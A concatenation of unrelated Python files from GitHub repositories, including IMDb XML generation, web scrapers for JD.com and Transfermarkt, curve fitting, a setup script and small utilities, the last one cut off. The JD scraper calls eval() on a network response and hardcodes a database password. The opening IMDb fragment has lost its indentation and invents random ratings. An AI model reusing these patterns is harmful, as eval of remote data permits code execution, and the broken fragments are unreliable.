Genre = ET.SubElement(TVshow,"Genres")
genreList = genres.split(',')
for gtext in genreList :
genre = ET.SubElement(Genre,"Genre")
genre.text = str(gtext)
Desc = ET.SubElement(TVshow,"Description")
Year = ET.SubElement(Desc,"Year")
Year.text = str(year)
rtime = ET.SubElement(Desc,"RunTime")
rtime.text = str(runtime)
#seasons
Seasons = ET.SubElement(TVshow,"Seasons")
numSeason = ET.SubElement(Seasons,"Number_of_Seasons")
#episodes
tittleEpisode.seasonNumber.replace(to_replace="\\N",value="0",inplace=True)
#all eps of series
epDF = tittleEpisode[tittleEpisode['parentTconst']==tconst]
numSeason.text = str(epDF.seasonNumber.unique().size)
if(epDF.empty==False):
epDF.sort_values('seasonNumber',inplace=True)
sList = epDF.seasonNumber.unique().tolist()
sList= map(int,sList)
for sL in sList:
sDF = epDF[epDF['seasonNumber']==str(sL)]
Season = ET.SubElement(Seasons,"Season")
numEp = ET.SubElement(Season,"No_of_Episodes")
numEp.text = str(sDF.shape[0])
Epi = ET.SubElement(Season,"Episodes")
yearS = " "
for idx in range(0,sDF.shape[0]):
etconst = sDF.tconst.iloc[idx]
EpiDF = tittleEP[tittleEP['tconst']==etconst]
episodeTag = ET.SubElement(Epi,"Episode")
if(EpiDF.empty==False):
epText = str(EpiDF.primaryTitle.iloc[0])
episodeTag.text = str(EpiDF.primaryTitle.iloc[0])
i = randint(1,10)
j = randint(1,10)
rate = str(i)+"."+str(j)
ratTag = ET.SubElement(Epi,"Rating")
ratTag.text = str(rate)
yearS = EpiDF.startYear.iloc[0]
Syear = ET.SubElement(Season,"Year")
Syear.text = str(yearS)
i = randint(1,10)
j = randint(1,10)
Srate = str(i)+"."+str(j)
SratTag = ET.SubElement(Season,"Rating")
SratTag.text = str(Srate)
#rating for seasom
Rate = ET.SubElement(TVshow,"Ratings")
Rate.text = str(rating)
# Emit one <Celeb> element per person record from the names dataset.
Celebs = ET.SubElement(root,"Celebs")
for i in range(0,10000):
    Celeb = ET.SubElement(Celebs,"Celeb")
    nconst = nameBasics.nconst.iloc[i]
    Celeb.set("CelebID",str(nconst))
    name = ET.SubElement(Celeb,"Name")
    name.text = str(nameBasics.primaryName.iloc[i])
    BirthYear = ET.SubElement(Celeb,"BirthYear")
    BirthYear.text = str(nameBasics.birthYear.iloc[i])
    primProf = ET.SubElement(Celeb,"PrimaryProfession")
    primProf.text = str(nameBasics.primaryProfession.iloc[i])
    knownFor = ET.SubElement(Celeb,"KnownFor")
    # BUG FIX: the original read ``.iloc[0]`` here, so every celeb was
    # credited with the known-for titles of the dataset's first row
    # instead of their own.
    knownForTitles = nameBasics.knownForTitles.iloc[i]
    # The column stores a comma-separated list of title ids.
    for el in knownForTitles.split(','):
        tt = ET.SubElement(knownFor,"TitleRef")
        tt.text = str(el)
# Serialise the whole document once all sections have been appended.
tree = ET.ElementTree(root)
tree.write("GenIMDBdata.xml")
| akhiln28/ontology_assignment1 | DataExtract.py | DataExtract.py | py | 6,500 | python | en | code | 0 | github-code | 13 |
254256141 | #!/usr/bin/env python3
"""
This script splits exported tiddlers.md into multiple Markdown files in a "tiddlers" folder.
Usage: python split-tiddlers.py
"""
# The name of the multiple tiddlers Markdown file
in_file = 'tiddlers.md'
# The name of the folder where the output is stored
out_folder = 'tiddlers'
import os
import re
# Regular expression to find the "title" field in the YAML front matter
rx_title = re.compile('title: [\'"](.+)[\'"]', re.IGNORECASE | re.MULTILINE)
# Characters that are illegal or unwise inside a file name.
rx_illegal_file_chars = re.compile("[\[\]#<>:*?|^/\"\\\t\r\n]")
# Illegal or unwise characters at the very beginning or end of a file name.
rx_strip = re.compile("(^[\.\s]+|[\s\.]+$)")
# Runs of spaces left behind after replacing adjacent illegal characters.
rx_double_spaces = re.compile(" +")


def clean_filename(title):
    """Turn a tiddler *title* into a safe file name.

    Illegal characters become single spaces, space runs are collapsed,
    and leading/trailing dots and whitespace are trimmed.
    """
    sanitized = rx_illegal_file_chars.sub(" ", title)
    collapsed = rx_double_spaces.sub(" ", sanitized)
    return rx_strip.sub("", collapsed)
# Create the output folder (no error if it already exists).
os.makedirs(out_folder, exist_ok=True)

# Split the export on LaTeX page breaks: one chunk per tiddler.
# NOTE(review): the input handle from open() below is never closed; a
# with-block would be tidier, though the OS reclaims it at exit.
for file in open(in_file, 'r').read().split('\\newpage'):
    # Every tiddler must carry a "title" field in its YAML front matter.
    titleMatch = rx_title.search(file)
    if titleMatch:
        fileTitle = clean_filename(titleMatch.group(1))
    else:
        raise ValueError('Cannot find title for one of the tiddlers')
    with open(os.path.join(out_folder, fileTitle) + '.md', 'w') as outfile:
        outfile.write(file.strip())
        # NOTE(review): redundant — the with-block already closes the file.
        outfile.close()
| cdaven/tiddlywiki-stuff | markdown-export/split-tiddlers.py | split-tiddlers.py | py | 1,480 | python | en | code | 10 | github-code | 13 |
23269638002 | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 20 09:24:31 2016
http://club.jd.com/clubservice.aspx?method=GetCommentsCount&referenceIds=3243686
@author: thinkpad
"""
import asyncio
import aiohttp
import aiomysql
import pandas as pd
import datetime
import queue
async def get_count(sku_group):
    """Fetch JD.com comment-count statistics for *sku_group* and insert
    one row into the ``comment_count_jd`` MySQL table.

    Relies on the module-global ``crawl_id`` set in ``__main__``.
    """
    global crawl_id
    url_base='http://club.jd.com/clubservice.aspx?method=GetCommentsCount&referenceIds='
    url=url_base+str(sku_group)
    async with aiohttp.ClientSession() as session:
        async with session.get(url) as response:
            count_text=await response.read()
    # SECURITY: eval() of a network response executes arbitrary code if the
    # endpoint is compromised -- json.loads() would be the safe replacement.
    count_dict=eval(count_text)
    # Flatten the single CommentsCount record into local variables.
    score1_count=count_dict['CommentsCount'][0]['Score1Count']
    score2_count=count_dict['CommentsCount'][0]['Score2Count']
    score3_count=count_dict['CommentsCount'][0]['Score3Count']
    score4_count=count_dict['CommentsCount'][0]['Score4Count']
    score5_count=count_dict['CommentsCount'][0]['Score5Count']
    show_count=count_dict['CommentsCount'][0]['ShowCount']
    comment_count=count_dict['CommentsCount'][0]['CommentCount']
    average_score=count_dict['CommentsCount'][0]['AverageScore']
    good_count=count_dict['CommentsCount'][0]['GoodCount']
    good_rate=count_dict['CommentsCount'][0]['GoodRate']
    good_rate_show=count_dict['CommentsCount'][0]['GoodRateShow']
    good_rate_style=count_dict['CommentsCount'][0]['GoodRateStyle']
    general_count=count_dict['CommentsCount'][0]['GeneralCount']
    general_rate=count_dict['CommentsCount'][0]['GeneralRate']
    general_rate_show=count_dict['CommentsCount'][0]['GeneralRateShow']
    general_rate_style=count_dict['CommentsCount'][0]['GeneralRateStyle']
    poor_count=count_dict['CommentsCount'][0]['PoorCount']
    poor_rate=count_dict['CommentsCount'][0]['PoorRate']
    poor_rate_show=count_dict['CommentsCount'][0]['PoorRateShow']
    poor_rate_style=count_dict['CommentsCount'][0]['PoorRateStyle']
    # Record when this row was crawled.
    crawl_date=datetime.date.today()
    now=datetime.datetime.now()
    crawl_time=now.strftime('%H:%M:%S')
    # Column order must match the INSERT statement below.
    count=[crawl_id,sku_group,score1_count,score2_count,score3_count,
           score4_count,score5_count,show_count,comment_count,average_score,
           good_count,good_rate,good_rate_show,good_rate_style,
           general_count,general_rate,general_rate_show,general_rate_style,
           poor_count,poor_rate,poor_rate_show,poor_rate_style,
           crawl_date,crawl_time]
    # NOTE(review): there is no try/finally here, so the connection is only
    # closed when the INSERT succeeds -- confirm whether leaks on error matter.
    conn=await aiomysql.connect(host='127.0.0.1',user='root',password='1111',
                                db='customer')
    cur=await conn.cursor()
    sql='insert into comment_count_jd(crawl_id,sku_group,score1_count,\
    score2_count,score3_count,score4_count,score5_count,show_count,\
    comment_count,average_score,good_count,good_rate,good_rate_show,\
    good_rate_style,general_count,general_rate,general_rate_show,\
    general_rate_style,poor_count,poor_rate,poor_rate_show,poor_rate_style,\
    crawl_date,crawl_time) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,\
    %s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'
    await cur.execute(sql,count)
    await conn.commit()
    await cur.close()
    conn.close()
if __name__=='__main__':
    # crawl_id tags every inserted row with this crawl run (read as a
    # global by get_count).
    crawl_id=input('请输入爬取编号:')
    sku_group_queue=queue.Queue()
    sku_group_dt=pd.read_csv('C:/Users/Administrator/Documents/Temp/sku_group.csv',dtype=str)
    for sku_group in sku_group_dt['sku_group']:
        sku_group_queue.put(sku_group)
    loop=asyncio.get_event_loop()
    while sku_group_queue.qsize()>0:
        # Crawl in batches of up to 10 concurrent requests.  Capping the
        # batch at the remaining queue size fixes a hang in the original,
        # which always pulled 10 items and so blocked forever on
        # Queue.get() once fewer than 10 SKUs remained.
        batch=min(10, sku_group_queue.qsize())
        tasks=[asyncio.ensure_future(get_count(sku_group_queue.get()))
               for _ in range(batch)]
        loop.run_until_complete(asyncio.wait(tasks))
| Strongc/pc-jd | get_comment_count_aiohttp.py | get_comment_count_aiohttp.py | py | 4,036 | python | en | code | 0 | github-code | 13 |
18416183881 | import sys
# Read player names until the sentinel 'Stop'; for each letter of a name the
# player guesses a number: matching the letter's ASCII code scores 10,
# otherwise 2.  The highest-scoring player wins.
player_name = input()
max_points = -sys.maxsize  # lower than any achievable score
winner = ''
while player_name != 'Stop':
    player_points = 0
    for i in player_name:
        number = int(input())
        i = ord(i)  # NOTE: reuses the loop variable for the ASCII code
        if i == number:
            player_points += 10
        else:
            player_points += 2
    # '>=' means a later player takes the lead on a tie.
    if player_points >= max_points:
        max_points = player_points
        winner = player_name
    player_name = input()
print(f'The winner is {winner} with {max_points} points!')
| MiroVatov/Python-SoftUni | Python Basic 2020/Exam - 06 - Name Game.py | Exam - 06 - Name Game.py | py | 499 | python | en | code | 0 | github-code | 13 |
14113017883 | """
Created on Wed Jan 11 09:40:26 2017
@author: bobmek
"""
import openpyxl
import numpy as np
import pylab
from scipy.optimize import curve_fit
import xlsxwriter
#import panda as pd
#sigmoid funtion
def sigmoid(x, x0, k, a, c):
    """Four-parameter logistic curve: baseline ``c`` plus amplitude ``a``
    scaled by a sigmoid centred at ``x0`` with steepness ``k``."""
    decay = np.exp(-k * (x - x0))
    return c + a / (1 + decay)
#commands to open notebook for I/O from Excel
wb1 = openpyxl.load_workbook('rawdata.xlsx')
# NOTE(review): get_sheet_by_name() is deprecated in newer openpyxl
# (use wb1['Sheet1']) -- confirm the pinned openpyxl version.
s1=wb1.get_sheet_by_name('Sheet1')
s2=wb1.get_sheet_by_name('Sheet2')
writesheet=s2
workbook = xlsxwriter.Workbook('Testdata.xlsx')
worksheet = workbook.add_worksheet()
#Actually reading the data in the spreadsheet and transposing it
RawData=np.array([[cell.value for cell in col] for col in s1['A3':'CS300']])
Analogs=np.array([[cell.value for cell in col] for col in s1['B1':'CS1']])
TRawData=np.transpose(RawData)
# First transposed row is the time axis; remaining rows are sample traces.
time=TRawData[0]
numsamples=len(TRawData)
samples=TRawData[1:numsamples]
# popt holds one fitted (x0, k, a, c) quadruple per sample row.
popt=np.zeros((numsamples-1, 4))
# Initial guess for curve_fit (all zeros).
p0=([0,0,0,0])
def my_range(start, end, step):
    """Yield an arithmetic progression from ``start`` to ``end``
    *inclusive* (unlike the builtin ``range``), stepping by ``step``."""
    current = start
    while current <= end:
        yield current
        current += step
#Going throught the "Columns" in the spreadsheet and fitting them each to a sigmoid
for m in my_range(0, numsamples-1,5):
    # NOTE(review): this slices a 2-D block of 4 sample rows and passes it
    # to curve_fit as ydata -- verify that a 2-D ydata is intended; a
    # failed fit falls into the except branch below.
    ydata=samples[m:m+4]
    pcov=np.zeros((4, 4))
    ydatalength=len(ydata)
    #p0[2]=max(ydata[0:100])
    #print(p0)
    try:
        popt[m], pcov = curve_fit(sigmoid, time, ydata, p0)
        x = np.linspace(1,150000,2000)
        y = sigmoid(x, *popt[m])
        # Plot raw data, the fitted curve and the EC50 midpoint marker.
        pylab.plot(time, ydata, '+', label='Raw Data')
        pylab.plot(x,y, label='Sigmoid Fit')
        pylab.plot(popt[m,0], popt[m,2]/2, 'o', label='EC50')
        #pylab.ylim(0, 25000)
        pylab.legend(loc='best')
        pylab.title(Analogs[0,m])
        count=str(m)
    #    savefig = Analogs[0,m] + '.png'
    #
    #    pylab.savefig(savefig)
    #
        pylab.show()
    # NOTE(review): bare except hides the real failure reason from curve_fit.
    except:
    #    for n in range (0,len(time)):
        try:
            ptry=([0,0,2500,0])
            # NOTE(review): len(time)/2 is a float on Python 3, so this
            # slice raises TypeError -- should be len(time)//2.
            popt[m], pcov = curve_fit(sigmoid, time[0:len(time)/2], ydata, p0)
            #print(n)
        except:
            print("nope")
            pass
    #    try:
    #        p1=()
    print(m)
# Structured array collecting one fitted parameter set per analog.
FinishedData=np.empty([numsamples-1], dtype=[('analog_id', 'U16'), ('EC50','f4'), ('k-value', 'f4'),('amplitude','f4'),('baseline','f4') ])
FinishedData['EC50']=popt[:,0]
FinishedData['k-value']=popt[:,1]
FinishedData['amplitude']=popt[:,2]
FinishedData['baseline']=popt[:,3]
FinishedData['analog_id']=Analogs
#na_csv_output = np.zeros((len(FinishedData),), dtype=('U16,f4,f4,f4,f4'))
#df=pd.DataFrame(na_csv_output)
# Plain-text dump of the fitted parameters.
np.savetxt('Finished analyzed.txt', FinishedData, delimiter=",", fmt='%r %f %f %f %f')
# Excel output: header row, then one row per analog.
worksheet.write('A1', 'Analog ID')
worksheet.write('B1', 'EC50')
worksheet.write('C1', 'K-Value')
worksheet.write('D1', 'Amplitude')
worksheet.write('E1', 'Baseline')
row = 1
col = 0
for m in range(0, numsamples-1):
    worksheet.write (row, col, FinishedData[m][col])
    worksheet.write (row, col + 1 , FinishedData[m][col+1])
    worksheet.write (row, col + 2 , FinishedData[m][col+2])
    worksheet.write (row, col + 3 , FinishedData[m][col+3])
    worksheet.write (row, col + 4 , FinishedData[m][col+4])
    row +=1
workbook.close()
#Actually write the analyzed data into the analyzed.xls spreadsheet
#for i in range(tot_tableshape[0]):
# for j in range(tot_tableshape[1]):
# writesheet[alph[i]+str(j+1)] = popt[i, j]
#
#wb1.save('analyzed.xlsx') | bobmek/fibrillation_analysis | sigmoid fit.py | sigmoid fit.py | py | 3,435 | python | en | code | 0 | github-code | 13 |
9038908542 | #!/usr/bin/env python
# Setup script for the PyGreSQL version 3
# created 2000/04 Mark Alexander <mwa@gate.net>
# tweaked 2000/05 Jeremy Hylton <jeremy@cnri.reston.va.us>
# win32 support 2001/01 Gerhard Haering <gerhard@bigfoot.de>
# requires distutils; standard in Python 1.6, otherwise download from
# http://www.python.org/sigs/distutils-sig/download.html
# You may have to change the first 3 variables (include_dirs,
# library_dirs, optional_libs) to match your postgres distribution.
# Now, you can:
# python setup.py build # to build the module
# python setup.py install # to install it
# See http://www.python.org/sigs/distutils-sig/doc/ for more information
# on using distutils to install Python programs.
from distutils.core import setup
from distutils.extension import Extension
import sys
if sys.platform == "win32":
    # If you want to build from source; you must have built a win32 native
    # libpq before and copied libpq.dll into the PyGreSQL root directory.
    win_pg_build_root = 'd:/dev/pg/postgresql-7.0.2/'
    include_dirs=[ win_pg_build_root + 'src/include', win_pg_build_root + '/src/include/libpq', win_pg_build_root + 'src', win_pg_build_root + 'src/interfaces/libpq' ]
    library_dirs=[ win_pg_build_root + 'src/interfaces/libpq/Release' ]
    optional_libs=[ 'libpqdll', 'wsock32', 'advapi32' ]
    data_files = [ 'libpq.dll' ]
else:
    include_dirs=['/usr/include/pgsql']
    # Bug fix: the path was missing its leading slash ('usr/lib/pgsql'
    # would be resolved relative to the build directory).
    library_dirs=['/usr/lib/pgsql']
    optional_libs=['pq']
    data_files = []

setup (name = "PyGreSQL",
       version = "3.1",
       description = "Python PostgreSQL Interfaces",
       author = "D'Arcy J. M. Cain",
       author_email = "darcy@druid.net",
       url = "http://www.druid.net/pygresql/",
       # 'licence' is the historical distutils alias for 'license'.
       licence = "Python",
       py_modules = ['pg', 'pgdb'],
       ext_modules = [ Extension(
            name='_pg',
            sources = ['pgmodule.c'],
            include_dirs = include_dirs,
            library_dirs = library_dirs,
            libraries = optional_libs
            )],
       data_files = data_files
       )
| orynider/php-5.6.3x4VC9 | postgresql/src/interfaces/python/setup.py | setup.py | py | 1,910 | python | en | code | 3 | github-code | 13 |
74789979857 | import requests
from googletrans import Translator
from random import choice
# Shared translator instance used by both API helpers below.
tradutor = Translator()
def pega_conselho(assunto=False):
    """Fetch a piece of advice from the Advice Slip API, translated.

    Args:
        assunto (bool | str, optional): If given a word, the word is first
            translated to English and used to search for related advice.
            Defaults to False, in which case a random piece of advice is
            returned.

    Returns:
        frase_traduzida: The chosen advice translated to Portuguese.
    """
    if assunto:
        assunto_traduzido = tradutor.translate(assunto, dest='en').text
        response = requests.get(f"https://api.adviceslip.com/advice/search/{assunto_traduzido}")
        # NOTE(review): each .json() call re-parses the body; caching the
        # parsed dict once would avoid the repeated work.
        if response.json()['total_results']:
            frase_escolhida = choice(response.json()['slips'])['advice']
        else:
            # No match: the API returns an explanatory message instead.
            frase_escolhida = response.json()['message']['text']
    else:
        response = requests.get('https://api.adviceslip.com/advice')
        frase_escolhida = response.json()['slip']['advice']
    frase_traduzida = tradutor.translate(frase_escolhida, dest='pt').text
    return frase_traduzida
def jogo_de_cartas():
    """Draw one card each for the player and the bot from a freshly
    shuffled 52-card deck via the Deck of Cards API.

    Returns:
        (pega_carta_jogador, pega_carta_bot): two dicts with each card's
        data (keys: code, image, images, value, suit), with ``suit``
        translated to Portuguese and ``value`` mapped to an integer rank
        (ACE high = 14).
    """
    LISTA_NIPE = ['HEARTS', 'CLUBS', 'DIAMONDS', 'SPADES']
    LISTA_NIPE_TRADUZIDO = ['Coração', 'Paus', 'Ouro', 'Espadas']
    # NOTE(review): the API reports pip cards as '2'..'10' plus face names;
    # the leading '1' entry looks unused -- verify against the API.
    VALOR_CARTA = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'JACK', 'QUEEN', 'KING', 'ACE']
    VALOR_CARTA_TRADUZIDO = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]
    pega_baralho = requests.get('https://deckofcardsapi.com/api/deck/new/shuffle/?deck_count=1').json()
    id_baralho = pega_baralho['deck_id']
    # fetch the player's card -------------------- #
    pega_carta_jogador = requests.get(f'https://deckofcardsapi.com/api/deck/{id_baralho}/draw/?count=1').json()['cards'][0]
    ## convert the suit
    nipe_carta_jogador = pega_carta_jogador['suit']
    pega_carta_jogador['suit'] = LISTA_NIPE_TRADUZIDO[LISTA_NIPE.index(nipe_carta_jogador)]
    ### convert the value
    valor_carta_jogador = pega_carta_jogador['value']
    pega_carta_jogador['value'] = VALOR_CARTA_TRADUZIDO[VALOR_CARTA.index(valor_carta_jogador)]
    # fetch the bot's card -------------------- #
    pega_carta_bot = requests.get(f'https://deckofcardsapi.com/api/deck/{id_baralho}/draw/?count=1').json()['cards'][0]
    ## convert the suit
    nipe_carta_bot = pega_carta_bot['suit']
    pega_carta_bot['suit'] = LISTA_NIPE_TRADUZIDO[LISTA_NIPE.index(nipe_carta_bot)]
    ### convert the value
    valor_carta_bot = pega_carta_bot['value']
    pega_carta_bot['value'] = VALOR_CARTA_TRADUZIDO[VALOR_CARTA.index(valor_carta_bot)]
    return pega_carta_jogador, pega_carta_bot
| danielns-op/sitecomflask | apis/apis.py | apis.py | py | 3,283 | python | pt | code | 0 | github-code | 13 |
def rev(n, temp=''):
    """Return ``temp`` followed by the decimal digits of the non-negative
    integer ``n`` in reversed order, as a string.

    >>> rev(100)
    '001'
    """
    quotient, last_digit = divmod(n, 10)
    if quotient == 0:
        return temp + str(n)
    return rev(quotient, temp + str(last_digit))

rev(100)
15954365825 | # -*- coding: UTF-8 -*-
import json
import time
# from MALL.config import setting
#
# setting_params = setting.DATABASE
# record_path = "{}\{}".format(setting_params['path'], setting_params['shop'])
def shop_record(data_path, username, action_type, shop_list, amount):
    """Append a timestamped shopping record to a user's JSON history file.

    The file ``record_of_<username>.json`` maps month numbers (strings
    without a leading zero) to lists of lines of the form
    ``"<timestamp> <action_type> <comma-joined items> <amount>"``.

    :param data_path: directory holding the per-user record files
    :param username: user whose record file is read and rewritten
    :param action_type: e.g. "buy"
    :param shop_list: list of commodity names
    :param amount: amount spent, as a string
    """
    with open("{}/record_of_{}.json".format(data_path, username), 'r', encoding='utf-8') as load_f:
        record_dict = json.load(load_f)
    current_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
    # Bug fix: the original keyed on the *last digit* of the month
    # (split('-')[1][-1]), so January ('1') collided with November
    # ('11' -> '1') etc.  Strip the leading zero numerically instead;
    # this is backward compatible for months 1-9.
    month = str(int(current_time.split('-')[1]))
    commodities = ','.join(shop_list)
    record_line = current_time + " " + action_type + " " + commodities + " " + amount
    record_dict.setdefault(month, []).append(record_line)
    with open("{}/record_of_{}.json".format(data_path, username), 'w', encoding='utf-8') as dump_f:
        json.dump(record_dict, dump_f)
# shop_record(record_path, "bigberg", "buy", ["iphone", "mac"], '18000')
| Bigberg/python | day5--ATM/MALL/core/shop_record.py | shop_record.py | py | 1,027 | python | en | code | 0 | github-code | 13 |
23769483050 | import sys
sys.path.append("../../")
from copy import deepcopy
import pandas as pd
from train_model import train
from notebooks.fc.hyperparams import hyperparameter as fc_hyperparameter
from notebooks.kc.hyperparams import hyperparameter as kc_hyperparameter
from notebooks.poa.hyperparams import hyperparameter as poa_hyperparameter
from notebooks.sp.hyperparams import hyperparameter as sp_hyperparameter
from notebooks.nl.hyperparams import hyperparameter as nl_hyperparameter
# Per-dataset experiment configuration.  For each environment:
#   hyperparameter : base hyperparameter dict imported from its notebook
#   max_neighbours : neighbour cap per masking threshold (kept as small as
#                    each threshold needs, to limit memory)
#   sequence       : which neighbour-count variant of the dataset to load
envs = {
    "kc": {
        "hyperparameter": kc_hyperparameter,
        "max_neighbours": [50, 50, 50, 50, 50, 100, 150, 250], # efficient value for each of the thresholds, just to not keep more data in memory than needed
        "sequence": "300" # dataset number of neihbours to use, just for efficiency
    },
    "poa": {
        "hyperparameter": poa_hyperparameter,
        "max_neighbours": [50, 100, 100, 150, 250, 450, 700, 950],
        "sequence": "1200"
    },
    "sp": {
        "hyperparameter": sp_hyperparameter,
        "max_neighbours": [50, 50, 100, 150, 350, 650, 1000, 1250],
        "sequence": "2400"
    },
    "fc": {
        "hyperparameter": fc_hyperparameter,
        "max_neighbours": [50, 50, 150, 250, 500, 1050, 1550, 2250],
        "sequence": "2400"
    },
    "nl": {
        "hyperparameter": nl_hyperparameter,
        "max_neighbours": [50, 50, 100, 100, 250, 650, 1100, 1900],
        "sequence": "2400"
    }
}
def train_and_save(db_name, hyperparameter, df, iteration):
    """Train one model configuration, append its metrics as a row to *df*,
    persist the running results to ``results_<db_name>.csv`` and return
    the extended dataframe."""
    spatial = train(**hyperparameter)
    outputs = spatial(SEQUENCE=envs[db_name]['sequence'])
    # outputs = (dataset, results, fit, embedded_train, embedded_test,
    #            predict_regression_train, predict_regression_test);
    # only the metrics tuple is recorded here.
    results = outputs[1]
    row = {
        "Dataset": db_name,
        "iteration": iteration,
        "isMasked": hyperparameter["use_masking"],
        "threshold": hyperparameter["mask_dist_threshold"],
        "MALE_test": results[0],
        "RMSE_test": results[1],
        "MAPE_test": results[2],
        "MALE_train": results[3],
        "RMSE_train": results[4],
        "MAPE_train": results[5],
    }
    df = pd.concat([df, pd.DataFrame([row])])
    df.to_csv(f"results_{db_name}.csv")
    return df
if __name__ == "__main__":
df = pd.DataFrame([] ,columns=["Dataset", "iteration", "isMasked", "threshold", "MALE_test", "RMSE_test", "MAPE_test", "MALE_train", "RMSE_train", "MAPE_train"])
thresholds = [0.01, 0.05, 0.1, 0.2, 0.35, 0.6, 0.8, 1.0]
env_name = sys.argv[1]
if env_name == "nl":
thresholds = [0.1, 1.0, 2.5, 5.0, 10.0, 25.0, 35.0, 50.0] # different thresholds for nl
assert len(thresholds) == len(envs[env_name]["max_neighbours"])
ITERATIONS = 10
for i in range(ITERATIONS):
print("Training on {}".format(env_name))
params = deepcopy(envs[env_name]["hyperparameter"])
df = train_and_save(env_name, params, df, iteration=i+1) # original run
params["use_masking"] = True
for threshold, max_neighbours in zip(thresholds, envs[env_name]["max_neighbours"]):
print(max_neighbours)
params["num_nearest"] = max_neighbours
params["num_nearest_geo"] = max_neighbours
params["num_nearest_eucli"] = max_neighbours
params["mask_dist_threshold"] = threshold
print("Training on {} with threshold {} and max_neighbours {}".format(env_name, params["mask_dist_threshold"], params["num_nearest"]))
df = train_and_save(env_name, params, df, iteration=i+1)
| Koen-Git/UC_Project_HPP | experiments.py | experiments.py | py | 3,556 | python | en | code | 1 | github-code | 13 |
834241665 | from bs4 import BeautifulSoup
import requests as req
import pandas as pd
SEASONS = [2018, 2019, 2020, 2021]
# code to find league - ES - Espanyol, 2 - second league level
CODE = 'ES2'
# link that works for all leagues (change only code & season for request)
# url = f'https://www.transfermarkt.com/laliga2/startseite/wettbewerb/{code}/plus/?saison_id={season}'
HEADERS = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'}

# Accumulator: one entry per (team, season).
data = {'team': [],
        'season': [],
        'squad': [],
        'age': [],
        'foreigners': [],
        'market_value': [],
        'total_market_value': []}

# web scraping
for season in SEASONS:
    # Bug fix: the original interpolated the whole SEASONS list
    # (saison_id={SEASONS}), so every iteration requested the same invalid
    # page.  Use the loop variable instead.
    url = f'https://www.transfermarkt.com/laliga2/startseite/wettbewerb/{CODE}/plus/?saison_id={season}'
    response = req.get(url, headers=HEADERS)
    bs = BeautifulSoup(response.content, 'html.parser')
    all_tr = bs.find_all('tr', {'class': ['odd', 'even']}, limit=22)  # limit - number of teams in the league
    for row in all_tr:
        all_td = row.find_all('td', recursive=False)
        data['team'].append(all_td[1].text)
        data['squad'].append(all_td[2].text)
        data['season'].append(season)
        data['age'].append(all_td[3].text)
        data['foreigners'].append(all_td[4].text)
        data['market_value'].append(all_td[5].text)
        data['total_market_value'].append(all_td[6].text)

# create dataframe
df = pd.DataFrame(data)
def convert_currency_to_number(df_row):
    """Convert a transfermarkt currency string to a plain number string,
    e.g. '€13.50m' -> '13500000' and '€500Th.' -> '500000'."""
    if df_row[-1] == 'm':
        # Drop the decimal point, strip the leading '€' and trailing 'm',
        # then pad to full euros.
        return df_row.replace('.', '')[1:-1] + '0000'
    # Thousands: strip the leading '€' and the trailing 'Th.' suffix.
    return df_row[1:-3] + '000'
# clear strings
df['team'] = df['team'].apply(lambda row: row.strip())
# converting value columns
df['market_value'] = df['market_value'].apply(convert_currency_to_number)
df['total_market_value'] = df['total_market_value'].apply(convert_currency_to_number)
# save to csv
# NOTE(review): this first save has no .csv extension and keeps the index,
# unlike the save inside the __main__ guard -- confirm it is intentional.
df.to_csv('team_market_value')
if __name__ == '__main__':
    print(df.head())
    df.to_csv('team_market_value_web_scraping_2.csv', index=False)
| Daniel-Prus/segunda_division_draw_analysis | 3_external_variables/01_teams_market_value_web_scraping.py | 01_teams_market_value_web_scraping.py | py | 2,127 | python | en | code | 0 | github-code | 13 |
35210830454 | # Uses python3
import sys
def optimal_weight(W, weights):
    """0/1 knapsack where each bar's value equals its weight: return the
    largest total weight not exceeding capacity ``W`` achievable by taking
    each bar in ``weights`` at most once."""
    best = [0] * (W + 1)
    for bar in weights:
        # Iterate capacities downwards so each bar is used at most once.
        for capacity in range(W, bar - 1, -1):
            best[capacity] = max(best[capacity], bar + best[capacity - bar])
    return best[W]
if __name__ == '__main__':
    # NOTE: ``input`` shadows the builtin, acceptable here since all of
    # stdin is read once.  ``n`` (the declared item count) is unused --
    # len(w) already carries it.
    input = sys.stdin.read()
    W, n, *w = list(map(int, input.split()))
    print(optimal_weight(W, w))
| vinaykudari/data-structures-and-algorithms | algorithmic-toolbox/week6_dynamic_programming2/1_maximum_amount_of_gold/knapsack.py | knapsack.py | py | 570 | python | en | code | 0 | github-code | 13 |
15624302930 | from embod_client import AsyncClient
import argparse
from datetime import datetime
import numpy as np
from uuid import UUID
class FPSMonitor:
    """Measures how many state updates per second the embod.ai environment
    delivers for a set of agents, over a fixed number of frames."""
    def __init__(self, agent_ids):
        # NOTE(review): self._times appears unused -- candidate for removal.
        self._times = []
        self._frame_count = 0
        self._max_frame_count = 1000  # stop after this many state updates
        self._frame_time = np.zeros(self._max_frame_count)  # per-frame ms
        self._last_time = None  # timestamp of the previous state update
        self._agent_ids = [UUID(agent_id) for agent_id in agent_ids]
    async def _connect_callback(self):
        # Register every agent once the client connects.
        # NOTE(review): _add_agent/_remove_agent are private client APIs.
        for agent_id in self._agent_ids:
            await self.client._add_agent(agent_id)
    async def _state_callback(self, agent_id, state, reward, error):
        """Called on every state update from the environment.

        :param agent_id: id of the agent the update belongs to
        :param state: the agent's state in the environment
        :param reward: the reward from the environment in the current state
        :param error: any error reported by the environment (bytes) or None
        """
        if error:
            print("Error: %s" % error.decode('UTF-8'))
            #self.client.stop()
            #return
        current_time = datetime.utcnow()
        if self._last_time is not None:
            # Record the gap since the previous update in milliseconds.
            time_between = current_time - self._last_time
            self._frame_time[self._frame_count] = time_between.days * 86400000 + time_between.seconds * 1000 + time_between.microseconds / 1000
            # Report a rolling average every 100 frames.
            if (self._frame_count + 1) % 100 == 0:
                average = self._frame_time[max(0, self._frame_count - 100):self._frame_count].mean()
                print("States per second: %.2f" % (1000.0/average))
        # Send an empty state, so the agent does not move anywhere
        if hasattr(self.client, '_action_size') and self.client._action_size is not None:
            await self.client.send_agent_action(agent_id, np.zeros(self.client._action_size))
        self._last_time = current_time
        self._frame_count += 1
        # Deregister all agents and stop once enough frames were measured.
        if self._frame_count == self._max_frame_count:
